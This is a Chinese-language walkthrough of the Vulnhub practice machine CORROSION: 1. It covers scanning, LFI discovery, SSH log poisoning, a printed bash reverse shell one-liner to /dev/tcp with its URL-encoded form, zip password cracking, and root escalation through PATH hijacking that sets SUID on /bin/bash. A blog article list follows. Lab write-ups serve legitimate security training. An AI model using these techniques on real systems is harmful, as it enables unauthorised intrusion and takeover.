Vulnhub 靶场 CORROSION: 1

前期准备:

靶机地址:https://www.vulnhub.com/entry/corrosion-1,730/

kali攻击机ip:192.168.147.211

靶机ip:192.168.147.190

一、信息收集

1、nmap进行扫描。



发现开放了22和80端口。

2、访问80端口。



源代码中也没有什么提示,扫一下目录:



挨个访问一下:

/tasks





提示需要完成任务,修改log日志。

/blog-post



randy 大概是个用户名。很具前面目录扫描的结果判断,/blog-post 目录后还有东西,再扫一下:



访问/archives

二、漏洞利用

查看一下 randylogs.php 文件:



发现空白什么都没有,用FUZZ进行模糊测试。



得到了file参数。

可以访问系统文件,访问之前提到的auth.log日志。

发现会记录 ssh 登录的所有活动,那我们可以尝试添加恶意 PHP 代码作为用户名,该代码将从用户输入并执行命令。这通常称为日志中毒。



再次查看日志信息:



发现没问题,写入shell

bash -c 'bash -i >& /dev/tcp/192.168.147.190/1234 0>&1'

url编码一下。

bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.147.190%2F1234%200%3E%261%27

访问并监听:



攻击机监听



之前我们访问 /etc/passwd 文件时,发现有个用户 randy,大概下一步是要提权到 rangdy。

三、提权

查看了一下系统内的文件



发现user_backuo.zip比较可疑,解压缩发现需要密码,传送到本机进行破解。



爆破一下压缩包。



pw == !randybaby

解压缩查看







发现了 /home/randy/tools/easysysinfo ,查看一下:



查看权限发现并不能改,那就用之前的方法,本地编辑 cat 文件,写入 shell

echo 'chmod +s /bin/bash' > cat
chmod 777 cat
export PATH=/home/randy/tools:$PATH
./easysysinfo
/bin/bash -p



提权成功。

最新文章

  1. Mac 系统环境变量配置
  2. asp.net GDI+ 绘制椭圆 ,弧线,扇形
  3. c# DESEncrypt 加密、解密算法
  4. mongodb命令使用大全(常用命令)
  5. stack, deque 和 queue的对比
  6. 发现未知字段 state ,过滤条件 [["state","not in",["draft"]]] 有误 的处理
  7. cf-282e
  8. jquery中ajax的使用
  9. STM32F0xx_GPIO配置详细过程
  10. 剑指OFFER之链表中倒数第k个节点(九度OJ1517)
  11. DDraw绘图
  12. 终于解决“Git Windows客户端保存用户名与密码”的问题
  13. 周末苦逼码代码,为css3的强大所颤抖了
  14. html 实现网址链接
  15. CC 3-Palindromes(manacher)
  16. Xcode7 beta 网络请求报错:The resource could not be loaded because the App Transport
  17. 集成CCFlow工作流与GPM的办公系统驰骋CCOA介绍(一)
  18. 合理使用软引用和弱引用,提升JVM内存使用性能
  19. Windows Server 2012 R2 官方原版镜像
  20. 手机端仿ios的三级联动脚本四

热门文章

  1. vue+html5实现上传图片
  2. mybatis动态标签——sql标签
  3. FPGA MIG调试bug(一)
  4. Apache druid笔记
  5. 2022-04-26内部群每日三题-清辉PMP
  6. 02. C语言基础知识
  7. 沁恒蓝牙系列芯片USB烧录故障排查
  8. 前端使用xlsx file-saver xlsx-style导出
  9. mybatis读取blob类型
  10. js,php中的面向对象